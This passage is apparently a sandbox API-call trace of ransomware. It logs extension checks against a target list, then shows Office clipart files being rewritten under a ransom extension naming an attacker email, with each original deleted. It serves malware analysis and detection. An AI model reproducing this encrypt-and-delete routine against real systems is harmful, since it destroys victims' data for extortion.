(lpString=".dbf") returned 4 [0068.352] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.352] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.353] lstrlenW (lpString=".1cd") returned 4 [0068.353] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02298_.WMF") returned 68 [0068.353] lstrlenW (lpString=".jpg") returned 4 [0068.353] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.353] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.353] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.353] GetLastError () returned 0x0 [0068.353] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xc0a, lpOverlapped=0x0) returned 1 [0068.360] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xc10, lpOverlapped=0x0) returned 1 [0068.361] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.361] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.361] SetEndOfFile (hFile=0x2c0) returned 1 [0068.361] CloseHandle (hObject=0x2c0) returned 1 [0068.361] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.361] SetEndOfFile (hFile=0x340) returned 1 [0068.362] CloseHandle (hObject=0x340) returned 1 [0068.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02313_.wmf")) returned 1 [0068.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.363] lstrlenW (lpString=".doc") returned 4 [0068.363] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString=".docx") returned 5 [0068.363] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.363] lstrlenW (lpString=".pdf") returned 4 [0068.363] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString=".xls") returned 4 [0068.363] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.363] lstrlenW (lpString=".xlsx") returned 5 [0068.363] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.363] lstrlenW (lpString=".ppt") returned 4 [0068.363] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.363] lstrlenW (lpString=".zip") returned 4 [0068.363] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.363] lstrlenW (lpString=".rar") returned 4 [0068.363] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString=".bz2") returned 4 [0068.363] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString=".7z") returned 3 [0068.363] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.363] lstrlenW (lpString=".dbf") returned 4 [0068.363] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.363] lstrlenW (lpString=".1cd") returned 4 [0068.363] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02313_.WMF") returned 68 [0068.364] lstrlenW (lpString=".jpg") returned 4 [0068.364] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.369] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.369] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.370] GetLastError () returned 0x0 [0068.370] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5664, lpOverlapped=0x0) returned 1 [0068.387] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5670, lpOverlapped=0x0) returned 1 [0068.389] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.389] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.389] SetEndOfFile (hFile=0x354) returned 1 [0068.389] CloseHandle (hObject=0x354) returned 1 [0068.389] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.389] SetEndOfFile (hFile=0x2c8) returned 1 [0068.390] CloseHandle (hObject=0x2c8) returned 1 [0068.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00114_.wmf")) returned 1 [0068.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.391] lstrlenW (lpString=".doc") returned 4 [0068.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.391] lstrlenW (lpString=".docx") returned 5 [0068.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.391] lstrlenW (lpString=".pdf") returned 4 [0068.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.391] lstrlenW (lpString=".xls") returned 4 [0068.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.391] lstrlenW (lpString=".xlsx") returned 5 [0068.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.391] lstrlenW (lpString=".ppt") returned 4 [0068.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.391] lstrlenW (lpString=".zip") returned 4 [0068.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.391] lstrlenW (lpString=".rar") returned 4 [0068.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.391] lstrlenW (lpString=".bz2") returned 4 [0068.391] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.391] lstrlenW (lpString=".7z") returned 3 [0068.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.391] lstrlenW (lpString=".dbf") returned 4 [0068.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.392] lstrlenW (lpString=".1cd") returned 4 [0068.392] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00114_.WMF") returned 68 [0068.392] lstrlenW (lpString=".jpg") returned 4 [0068.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.392] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.392] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.392] GetLastError () returned 0x0 [0068.393] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x10ca8, lpOverlapped=0x0) returned 1 [0068.410] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x10cb0, lpOverlapped=0x0) returned 1 [0068.412] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.412] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.412] SetEndOfFile (hFile=0x354) returned 1 [0068.412] CloseHandle (hObject=0x354) returned 1 [0068.412] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.412] SetEndOfFile (hFile=0x2c8) returned 1 [0068.413] CloseHandle (hObject=0x2c8) returned 1 [0068.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.414] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hm00426_.wmf")) returned 1 [0068.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.414] lstrlenW (lpString=".doc") returned 4 [0068.414] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.414] lstrlenW (lpString=".docx") returned 5 [0068.414] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.414] lstrlenW (lpString=".pdf") returned 4 [0068.414] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.414] lstrlenW (lpString=".xls") returned 4 [0068.414] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.414] lstrlenW (lpString=".xlsx") returned 5 [0068.414] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.414] lstrlenW (lpString=".ppt") returned 4 [0068.415] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.415] lstrlenW (lpString=".zip") returned 4 [0068.415] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.415] lstrlenW (lpString=".rar") returned 4 [0068.415] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.415] lstrlenW (lpString=".bz2") returned 4 [0068.415] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.415] lstrlenW (lpString=".7z") returned 3 [0068.415] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.415] lstrlenW (lpString=".dbf") returned 4 [0068.415] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.415] lstrlenW (lpString=".1cd") returned 4 [0068.415] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0068.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HM00426_.WMF") returned 68 [0068.415] lstrlenW (lpString=".jpg") returned 4 [0068.415] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0068.415] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.415] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0068.416] GetLastError () returned 0x0 [0068.416] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x432, lpOverlapped=0x0) returned 1 [0068.431] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x440, lpOverlapped=0x0) returned 1 [0068.432] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.432] WriteFile (in: hFile=0x354, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0068.432] SetEndOfFile (hFile=0x354) returned 1 [0068.432] CloseHandle (hObject=0x354) returned 1 [0068.432] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.432] SetEndOfFile (hFile=0x2c8) returned 1 [0068.433] CloseHandle (hObject=0x2c8) returned 1 [0068.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0068.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00177_.wmf")) returned 1 [0068.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0068.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0068.434] lstrlenW (lpString=".doc") returned 4 [0068.434] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0068.434] lstrlenW (lpString=".docx") returned 5 [0068.434] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0068.434] lstrlenW (lpString=".pdf") returned 4 [0068.434] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0068.434] lstrlenW (lpString=".xls") returned 4 [0068.434] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0068.434] lstrlenW (lpString=".xlsx") returned 5 [0068.434] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0068.434] lstrlenW (lpString=".ppt") returned 4 [0068.434] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0068.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0068.434] lstrlenW (lpString=".zip") returned 4 [0068.434] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0068.434] lstrlenW (lpString=".rar") returned 4 [0068.434] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0068.434] lstrlenW (lpString=".bz2") returned 4 [0068.434] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0068.435] lstrlenW (lpString=".7z") returned 3 [0068.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0068.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0068.435] lstrlenW (lpString=".dbf") returned 4 [0068.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0068.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0068.435] lstrlenW (lpString=".1cd") returned 4 [0068.435] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00177_.WMF") returned 68 [0069.039] lstrlenW (lpString=".jpg") returned 4 [0069.039] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.039] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.040] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.040] GetLastError () returned 0x0 [0069.040] ReadFile (in: hFile=0x38c, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4c4, lpOverlapped=0x0) returned 1 [0069.058] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4d0, lpOverlapped=0x0) returned 1 [0069.059] ReadFile (in: hFile=0x38c, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.059] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.059] SetEndOfFile (hFile=0x370) returned 1 [0069.059] CloseHandle (hObject=0x370) returned 1 [0069.059] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.059] SetEndOfFile (hFile=0x38c) returned 1 [0069.060] CloseHandle (hObject=0x38c) returned 1 [0069.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.061] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0075478.gif")) returned 1 [0069.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.061] lstrlenW (lpString=".doc") returned 4 [0069.061] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0069.061] lstrlenW (lpString=".docx") returned 5 [0069.061] lstrcmpiW (lpString1=".docx", lpString2="8.GIF") returned -1 [0069.061] lstrlenW (lpString=".pdf") returned 4 [0069.061] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0069.061] lstrlenW (lpString=".xls") returned 4 [0069.061] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0069.061] lstrlenW (lpString=".xlsx") returned 5 [0069.061] lstrcmpiW (lpString1=".xlsx", lpString2="8.GIF") returned -1 [0069.061] lstrlenW (lpString=".ppt") returned 4 [0069.061] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0069.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.061] lstrlenW (lpString=".zip") returned 4 [0069.061] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0069.062] lstrlenW (lpString=".rar") returned 4 [0069.062] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0069.062] lstrlenW (lpString=".bz2") returned 4 [0069.062] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0069.062] lstrlenW (lpString=".7z") returned 3 [0069.062] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0069.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.062] lstrlenW (lpString=".dbf") returned 4 [0069.062] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0069.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.062] lstrlenW (lpString=".1cd") returned 4 [0069.062] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0069.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0075478.GIF") returned 68 [0069.062] lstrlenW (lpString=".jpg") returned 4 [0069.062] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0069.064] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.064] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0086426.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0086426.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0069.064] GetLastError () returned 0x0 [0069.064] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5516, lpOverlapped=0x0) returned 1 [0069.077] WriteFile (in: hFile=0x380, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5520, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, 